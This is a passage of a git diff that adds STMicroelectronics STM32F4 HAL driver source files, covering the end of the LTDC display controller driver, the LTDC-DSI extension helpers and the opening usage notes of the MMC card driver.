assert_param(IS_LTDC_ALPHA(Alpha)); + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the Alpha value */ + pLayerCfg->Alpha = Alpha; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Reconfigure the frame buffer Address without reloading. + * Variant of the function HAL_LTDC_SetAddress without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param Address new address value. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetAddress_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t Address, uint32_t LayerIdx) +{ + LTDC_LayerCfgTypeDef *pLayerCfg; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Get layer configuration from handle structure */ + pLayerCfg = &hltdc->LayerCfg[LayerIdx]; + + /* Reconfigure the Address */ + pLayerCfg->FBStartAdress = Address; + + /* Set LTDC parameters */ + LTDC_SetConfig(hltdc, pLayerCfg, LayerIdx); + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Function used to reconfigure the pitch for specific cases where the attached LayerIdx buffer have a width that is + * larger than the one intended to be displayed on screen. Example of a buffer 800x480 attached to layer for which we + * want to read and display on screen only a portion 320x240 taken in the center of the buffer. The pitch in pixels + * will be in that case 800 pixels and not 320 pixels as initially configured by previous call to HAL_LTDC_ConfigLayer(). + * @note This function should be called only after a previous call to HAL_LTDC_ConfigLayer() to modify the default pitch + * configured by HAL_LTDC_ConfigLayer() when required (refer to example described just above). + * Variant of the function HAL_LTDC_SetPitch without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LinePitchInPixels New line pitch in pixels to configure for LTDC layer 'LayerIdx'. + * @param LayerIdx LTDC layer index concerned by the modification of line pitch. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_SetPitch_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t LinePitchInPixels, uint32_t LayerIdx) +{ + uint32_t tmp; + uint32_t pitchUpdate; + uint32_t pixelFormat; + + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* get LayerIdx used pixel format */ + pixelFormat = hltdc->LayerCfg[LayerIdx].PixelFormat; + + if (pixelFormat == LTDC_PIXEL_FORMAT_ARGB8888) + { + tmp = 4U; + } + else if (pixelFormat == LTDC_PIXEL_FORMAT_RGB888) + { + tmp = 3U; + } + else if ((pixelFormat == LTDC_PIXEL_FORMAT_ARGB4444) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_RGB565) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_ARGB1555) || \ + (pixelFormat == LTDC_PIXEL_FORMAT_AL88)) + { + tmp = 2U; + } + else + { + tmp = 1U; + } + + pitchUpdate = ((LinePitchInPixels * tmp) << 16U); + + /* Clear previously set standard pitch */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLR &= ~LTDC_LxCFBLR_CFBP; + + /* Set new line pitch value */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLR |= pitchUpdate; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + + +/** + * @brief Configure the color keying without reloading. + * Variant of the function HAL_LTDC_ConfigColorKeying without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param RGBValue the color key value + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_ConfigColorKeying_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t RGBValue, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Configure the default color values */ + LTDC_LAYER(hltdc, LayerIdx)->CKCR &= ~(LTDC_LxCKCR_CKBLUE | LTDC_LxCKCR_CKGREEN | LTDC_LxCKCR_CKRED); + LTDC_LAYER(hltdc, LayerIdx)->CKCR = RGBValue; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Enable the color keying without reloading. + * Variant of the function HAL_LTDC_EnableColorKeying without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_EnableColorKeying_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Enable LTDC color keying by setting COLKEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR |= (uint32_t)LTDC_LxCR_COLKEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Disable the color keying without reloading. + * Variant of the function HAL_LTDC_DisableColorKeying without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_DisableColorKeying_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable LTDC color keying by setting COLKEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR &= ~(uint32_t)LTDC_LxCR_COLKEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Enable the color lookup table without reloading. + * Variant of the function HAL_LTDC_EnableCLUT without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_EnableCLUT_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable LTDC color lookup table by setting CLUTEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR |= (uint32_t)LTDC_LxCR_CLUTEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @brief Disable the color lookup table without reloading. + * Variant of the function HAL_LTDC_DisableCLUT without immediate reload. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: + * LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDC_DisableCLUT_NoReload(LTDC_HandleTypeDef *hltdc, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_LTDC_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hltdc); + + /* Change LTDC peripheral state */ + hltdc->State = HAL_LTDC_STATE_BUSY; + + /* Disable LTDC color lookup table by setting CLUTEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR &= ~(uint32_t)LTDC_LxCR_CLUTEN; + + /* Change the LTDC state*/ + hltdc->State = HAL_LTDC_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hltdc); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup LTDC_Exported_Functions_Group4 Peripheral State and Errors functions + * @brief Peripheral State and Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the LTDC handle state. + (+) Get the LTDC handle error code. + +@endverbatim + * @{ + */ + +/** + * @brief Return the LTDC handle state. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval HAL state + */ +HAL_LTDC_StateTypeDef HAL_LTDC_GetState(LTDC_HandleTypeDef *hltdc) +{ + return hltdc->State; +} + +/** + * @brief Return the LTDC handle error code. + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @retval LTDC Error Code + */ +uint32_t HAL_LTDC_GetError(LTDC_HandleTypeDef *hltdc) +{ + return hltdc->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup LTDC_Private_Functions LTDC Private Functions + * @{ + */ + +/** + * @brief Configure the LTDC peripheral + * @param hltdc Pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param pLayerCfg Pointer LTDC Layer Configuration structure + * @param LayerIdx LTDC Layer index. + * This parameter can be one of the following values: LTDC_LAYER_1 (0) or LTDC_LAYER_2 (1) + * @retval None + */ +static void LTDC_SetConfig(LTDC_HandleTypeDef *hltdc, LTDC_LayerCfgTypeDef *pLayerCfg, uint32_t LayerIdx) +{ + uint32_t tmp; + uint32_t tmp1; + uint32_t tmp2; + + /* Configure the horizontal start and stop position */ + tmp = ((pLayerCfg->WindowX1 + ((hltdc->Instance->BPCR & LTDC_BPCR_AHBP) >> 16U)) << 16U); + LTDC_LAYER(hltdc, LayerIdx)->WHPCR &= ~(LTDC_LxWHPCR_WHSTPOS | LTDC_LxWHPCR_WHSPPOS); + LTDC_LAYER(hltdc, LayerIdx)->WHPCR = ((pLayerCfg->WindowX0 + ((hltdc->Instance->BPCR & LTDC_BPCR_AHBP) >> 16U) + 1U) | tmp); + + /* Configure the vertical start and stop position */ + tmp = ((pLayerCfg->WindowY1 + (hltdc->Instance->BPCR & LTDC_BPCR_AVBP)) << 16U); + LTDC_LAYER(hltdc, LayerIdx)->WVPCR &= ~(LTDC_LxWVPCR_WVSTPOS | LTDC_LxWVPCR_WVSPPOS); + LTDC_LAYER(hltdc, LayerIdx)->WVPCR = ((pLayerCfg->WindowY0 + (hltdc->Instance->BPCR & LTDC_BPCR_AVBP) + 1U) | tmp); + + /* Specifies the pixel format */ + LTDC_LAYER(hltdc, LayerIdx)->PFCR &= ~(LTDC_LxPFCR_PF); + LTDC_LAYER(hltdc, LayerIdx)->PFCR = (pLayerCfg->PixelFormat); + + /* Configure the default color values */ + tmp = ((uint32_t)(pLayerCfg->Backcolor.Green) << 8U); + tmp1 = ((uint32_t)(pLayerCfg->Backcolor.Red) << 16U); + tmp2 = (pLayerCfg->Alpha0 << 24U); + LTDC_LAYER(hltdc, LayerIdx)->DCCR &= ~(LTDC_LxDCCR_DCBLUE | LTDC_LxDCCR_DCGREEN | LTDC_LxDCCR_DCRED | LTDC_LxDCCR_DCALPHA); + LTDC_LAYER(hltdc, LayerIdx)->DCCR = (pLayerCfg->Backcolor.Blue | tmp | tmp1 | tmp2); + + /* Specifies the constant alpha value */ + LTDC_LAYER(hltdc, LayerIdx)->CACR &= ~(LTDC_LxCACR_CONSTA); + LTDC_LAYER(hltdc, LayerIdx)->CACR = (pLayerCfg->Alpha); + + /* Specifies the blending factors */ + LTDC_LAYER(hltdc, LayerIdx)->BFCR &= ~(LTDC_LxBFCR_BF2 | LTDC_LxBFCR_BF1); + LTDC_LAYER(hltdc, LayerIdx)->BFCR = (pLayerCfg->BlendingFactor1 | pLayerCfg->BlendingFactor2); + + /* Configure the color frame buffer start address */ + LTDC_LAYER(hltdc, LayerIdx)->CFBAR &= ~(LTDC_LxCFBAR_CFBADD); + LTDC_LAYER(hltdc, LayerIdx)->CFBAR = (pLayerCfg->FBStartAdress); + + if (pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_ARGB8888) + { + tmp = 4U; + } + else if (pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_RGB888) + { + tmp = 3U; + } + else if ((pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_ARGB4444) || \ + (pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_RGB565) || \ + (pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_ARGB1555) || \ + (pLayerCfg->PixelFormat == LTDC_PIXEL_FORMAT_AL88)) + { + tmp = 2U; + } + else + { + tmp = 1U; + } + + /* Configure the color frame buffer pitch in byte */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLR &= ~(LTDC_LxCFBLR_CFBLL | LTDC_LxCFBLR_CFBP); + LTDC_LAYER(hltdc, LayerIdx)->CFBLR = (((pLayerCfg->ImageWidth * tmp) << 16U) | (((pLayerCfg->WindowX1 - pLayerCfg->WindowX0) * tmp) + 3U)); + /* Configure the frame buffer line number */ + LTDC_LAYER(hltdc, LayerIdx)->CFBLNR &= ~(LTDC_LxCFBLNR_CFBLNBR); + LTDC_LAYER(hltdc, LayerIdx)->CFBLNR = (pLayerCfg->ImageHeight); + + /* Enable LTDC_Layer by setting LEN bit */ + LTDC_LAYER(hltdc, LayerIdx)->CR |= (uint32_t)LTDC_LxCR_LEN; +} + +/** + * @} + */ + + +/** + * @} + */ + +#endif /* LTDC */ + +#endif /* HAL_LTDC_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc_ex.c new file mode 100644 index 000000000..8c39194a6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_ltdc_ex.c @@ -0,0 +1,149 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_ltdc_ex.c + * @author MCD Application Team + * @brief LTDC Extension HAL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#if defined(HAL_LTDC_MODULE_ENABLED) && defined(HAL_DSI_MODULE_ENABLED) + +#if defined (LTDC) && defined (DSI) + +/** @defgroup LTDCEx LTDCEx + * @brief LTDC HAL module driver + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @defgroup LTDCEx_Exported_Functions LTDC Extended Exported Functions + * @{ + */ + +/** @defgroup LTDCEx_Exported_Functions_Group1 Initialization and Configuration functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the LTDC + +@endverbatim + * @{ + */ + +/** + * @brief Retrieve common parameters from DSI Video mode configuration structure + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param VidCfg pointer to a DSI_VidCfgTypeDef structure that contains + * the DSI video mode configuration parameters + * @note The implementation of this function is taking into account the LTDC + * polarities inversion as described in the current LTDC specification + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDCEx_StructInitFromVideoConfig(LTDC_HandleTypeDef *hltdc, DSI_VidCfgTypeDef *VidCfg) +{ + /* Retrieve signal polarities from DSI */ + + /* The following polarity is inverted: + LTDC_DEPOLARITY_AL <-> LTDC_DEPOLARITY_AH */ + + /* Note 1 : Code in line w/ Current LTDC specification */ + hltdc->Init.DEPolarity = (VidCfg->DEPolarity == DSI_DATA_ENABLE_ACTIVE_HIGH) ? LTDC_DEPOLARITY_AL : LTDC_DEPOLARITY_AH; + hltdc->Init.VSPolarity = (VidCfg->VSPolarity == DSI_VSYNC_ACTIVE_HIGH) ? LTDC_VSPOLARITY_AH : LTDC_VSPOLARITY_AL; + hltdc->Init.HSPolarity = (VidCfg->HSPolarity == DSI_HSYNC_ACTIVE_HIGH) ? LTDC_HSPOLARITY_AH : LTDC_HSPOLARITY_AL; + + /* Note 2: Code to be used in case LTDC polarities inversion updated in the specification */ + /* hltdc->Init.DEPolarity = VidCfg->DEPolarity << 29; + hltdc->Init.VSPolarity = VidCfg->VSPolarity << 29; + hltdc->Init.HSPolarity = VidCfg->HSPolarity << 29; */ + + /* Retrieve vertical timing parameters from DSI */ + hltdc->Init.VerticalSync = VidCfg->VerticalSyncActive - 1U; + hltdc->Init.AccumulatedVBP = VidCfg->VerticalSyncActive + VidCfg->VerticalBackPorch - 1U; + hltdc->Init.AccumulatedActiveH = VidCfg->VerticalSyncActive + VidCfg->VerticalBackPorch + VidCfg->VerticalActive - 1U; + hltdc->Init.TotalHeigh = VidCfg->VerticalSyncActive + VidCfg->VerticalBackPorch + VidCfg->VerticalActive + VidCfg->VerticalFrontPorch - 1U; + + return HAL_OK; +} + +/** + * @brief Retrieve common parameters from DSI Adapted command mode configuration structure + * @param hltdc pointer to a LTDC_HandleTypeDef structure that contains + * the configuration information for the LTDC. + * @param CmdCfg pointer to a DSI_CmdCfgTypeDef structure that contains + * the DSI command mode configuration parameters + * @note The implementation of this function is taking into account the LTDC + * polarities inversion as described in the current LTDC specification + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LTDCEx_StructInitFromAdaptedCommandConfig(LTDC_HandleTypeDef *hltdc, DSI_CmdCfgTypeDef *CmdCfg) +{ + /* Retrieve signal polarities from DSI */ + + /* The following polarities are inverted: + LTDC_DEPOLARITY_AL <-> LTDC_DEPOLARITY_AH + LTDC_VSPOLARITY_AL <-> LTDC_VSPOLARITY_AH + LTDC_HSPOLARITY_AL <-> LTDC_HSPOLARITY_AH)*/ + + /* Note 1 : Code in line w/ Current LTDC specification */ + hltdc->Init.DEPolarity = (CmdCfg->DEPolarity == DSI_DATA_ENABLE_ACTIVE_HIGH) ? LTDC_DEPOLARITY_AL : LTDC_DEPOLARITY_AH; + hltdc->Init.VSPolarity = (CmdCfg->VSPolarity == DSI_VSYNC_ACTIVE_HIGH) ? LTDC_VSPOLARITY_AL : LTDC_VSPOLARITY_AH; + hltdc->Init.HSPolarity = (CmdCfg->HSPolarity == DSI_HSYNC_ACTIVE_HIGH) ? LTDC_HSPOLARITY_AL : LTDC_HSPOLARITY_AH; + + /* Note 2: Code to be used in case LTDC polarities inversion updated in the specification */ + /* hltdc->Init.DEPolarity = CmdCfg->DEPolarity << 29; + hltdc->Init.VSPolarity = CmdCfg->VSPolarity << 29; + hltdc->Init.HSPolarity = CmdCfg->HSPolarity << 29; */ + + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* LTDC && DSI */ + +#endif /* HAL_LTCD_MODULE_ENABLED && HAL_DSI_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_mmc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_mmc.c new file mode 100644 index 000000000..b0827f70a --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_mmc.c @@ -0,0 +1,2973 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_mmc.c + * @author MCD Application Team + * @brief MMC card HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Secure Digital (MMC) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + MMC card Control functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver implements a high level communication layer for read and write from/to + this memory. The needed STM32 hardware resources (SDMMC and GPIO) are performed by + the user in HAL_MMC_MspInit() function (MSP layer). + Basically, the MSP layer configuration should be the same as we provide in the + examples. + You can easily tailor this configuration according to hardware resources. + + [..] + This driver is a generic layered driver for SDMMC memories which uses the HAL + SDMMC driver functions to interface with MMC and eMMC cards devices. + It is used as follows: + + (#)Initialize the SDMMC low level resources by implement the HAL_MMC_MspInit() API: + (##) Enable the SDMMC interface clock using __HAL_RCC_SDMMC_CLK_ENABLE(); + (##) SDMMC pins configuration for MMC card + (+++) Enable the clock for the SDMMC GPIOs using the functions __HAL_RCC_GPIOx_CLK_ENABLE(); + (+++) Configure these SDMMC pins as alternate function pull-up using HAL_GPIO_Init() + and according to your pin assignment; + (##) DMA Configuration if you need to use DMA process (HAL_MMC_ReadBlocks_DMA() + and HAL_MMC_WriteBlocks_DMA() APIs). + (+++) Enable the DMAx interface clock using __HAL_RCC_DMAx_CLK_ENABLE(); + (+++) Configure the DMA using the function HAL_DMA_Init() with predeclared and filled. + (##) NVIC configuration if you need to use interrupt process when using DMA transfer. + (+++) Configure the SDMMC and DMA interrupt priorities using function HAL_NVIC_SetPriority(); + DMA priority is superior to SDMMC's priority + (+++) Enable the NVIC DMA and SDMMC IRQs using function HAL_NVIC_EnableIRQ() + (+++) SDMMC interrupts are managed using the macros __HAL_MMC_ENABLE_IT() + and __HAL_MMC_DISABLE_IT() inside the communication process. + (+++) SDMMC interrupts pending bits are managed using the macros __HAL_MMC_GET_IT() + and __HAL_MMC_CLEAR_IT() + (##) NVIC configuration if you need to use interrupt process (HAL_MMC_ReadBlocks_IT() + and HAL_MMC_WriteBlocks_IT() APIs). + (+++) Configure the SDMMC interrupt priorities using function HAL_NVIC_SetPriority(); + (+++) Enable the NVIC SDMMC IRQs using function HAL_NVIC_EnableIRQ() + (+++) SDMMC interrupts are managed using the macros __HAL_MMC_ENABLE_IT() + and __HAL_MMC_DISABLE_IT() inside the communication process. + (+++) SDMMC interrupts pending bits are managed using the macros __HAL_MMC_GET_IT() + and __HAL_MMC_CLEAR_IT() + (#) At this stage, you can perform MMC read/write/erase operations after MMC card initialization + + + *** MMC Card Initialization and configuration *** + ================================================ + [..] + To initialize the MMC Card, use the HAL_MMC_Init() function. It Initializes + SDMMC Peripheral (STM32 side) and the MMC Card, and put it into StandBy State (Ready for data transfer). + This function provide the following operations: + + (#) Initialize the SDMMC peripheral interface with defaullt configuration. + The initialization process is done at 400KHz. You can change or adapt + this frequency by adjusting the "ClockDiv" field. + The MMC Card frequency (SDMMC_CK) is computed as follows: + + SDMMC_CK = SDMMCCLK / (ClockDiv + 2) + + In initialization mode and according to the MMC Card standard, + make sure that the SDMMC_CK frequency doesn't exceed 400KHz. + + This phase of initialization is done through SDMMC_Init() and + SDMMC_PowerState_ON() SDMMC low level APIs. + + (#) Initialize the MMC card. The API used is HAL_MMC_InitCard(). + This phase allows the card initialization and identification + and check the MMC Card type (Standard Capacity or High Capacity) + The initialization flow is compatible with MMC standard. + + This API (HAL_MMC_InitCard()) could be used also to reinitialize the card in case + of plug-off plug-in. + + (#) Configure the MMC Card Data transfer frequency. By Default, the card transfer + frequency is set to 24MHz. You can change or adapt this frequency by adjusting + the "ClockDiv" field. + In transfer mode and according to the MMC Card standard, make sure that the + SDMMC_CK frequency doesn't exceed 25MHz and 50MHz in High-speed mode switch. + To be able to use a frequency higher than 24MHz, you should use the SDMMC + peripheral in bypass mode. Refer to the corresponding reference manual + for more details. + + (#) Select the corresponding MMC Card according to the address read with the step 2. + + (#) Configure the MMC Card in wide bus mode: 4-bits data. + + *** MMC Card Read operation *** + ============================== + [..] + (+) You can read from MMC card in polling mode by using function HAL_MMC_ReadBlocks(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + + (+) You can read from MMC card in DMA mode by using function HAL_MMC_ReadBlocks_DMA(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + You could also check the DMA transfer process through the MMC Rx interrupt event. + + (+) You can read from MMC card in Interrupt mode by using function HAL_MMC_ReadBlocks_IT(). + This function allows the read of 512 bytes blocks. + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + You could also check the IT transfer process through the MMC Rx interrupt event. + + *** MMC Card Write operation *** + =============================== + [..] + (+) You can write to MMC card in polling mode by using function HAL_MMC_WriteBlocks(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + + (+) You can write to MMC card in DMA mode by using function HAL_MMC_WriteBlocks_DMA(). + This function support only 512-bytes block length (the block size should be + chosen as 512 byte). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + You could also check the DMA transfer process through the MMC Tx interrupt event. + + (+) You can write to MMC card in Interrupt mode by using function HAL_MMC_WriteBlocks_IT(). + This function allows the read of 512 bytes blocks. + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_MMC_GetCardState() function for MMC card state. + You could also check the IT transfer process through the MMC Tx interrupt event. + + *** MMC card information *** + =========================== + [..] + (+) To get MMC card information, you can use the function HAL_MMC_GetCardInfo(). + It returns useful information about the MMC card such as block size, card type, + block number ... + + *** MMC card CSD register *** + ============================ + [..] + (+) The HAL_MMC_GetCardCSD() API allows to get the parameters of the CSD register. + Some of the CSD parameters are useful for card initialization and identification. + + *** MMC card CID register *** + ============================ + [..] + (+) The HAL_MMC_GetCardCID() API allows to get the parameters of the CID register. + Some of the CID parameters are useful for card initialization and identification. + + *** MMC HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in MMC HAL driver. + + (+) __HAL_MMC_ENABLE : Enable the MMC device + (+) __HAL_MMC_DISABLE : Disable the MMC device + (+) __HAL_MMC_DMA_ENABLE: Enable the SDMMC DMA transfer + (+) __HAL_MMC_DMA_DISABLE: Disable the SDMMC DMA transfer + (+) __HAL_MMC_ENABLE_IT: Enable the MMC device interrupt + (+) __HAL_MMC_DISABLE_IT: Disable the MMC device interrupt + (+) __HAL_MMC_GET_FLAG:Check whether the specified MMC flag is set or not + (+) __HAL_MMC_CLEAR_FLAG: Clear the MMC's pending flags + + [..] + (@) You can refer to the MMC HAL driver header file for more useful macros + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_MMC_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions HAL_MMC_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) MspInitCallback : MMC MspInit. + (+) MspDeInitCallback : MMC MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function HAL_MMC_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) MspInitCallback : MMC MspInit. + (+) MspDeInitCallback : MMC MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. 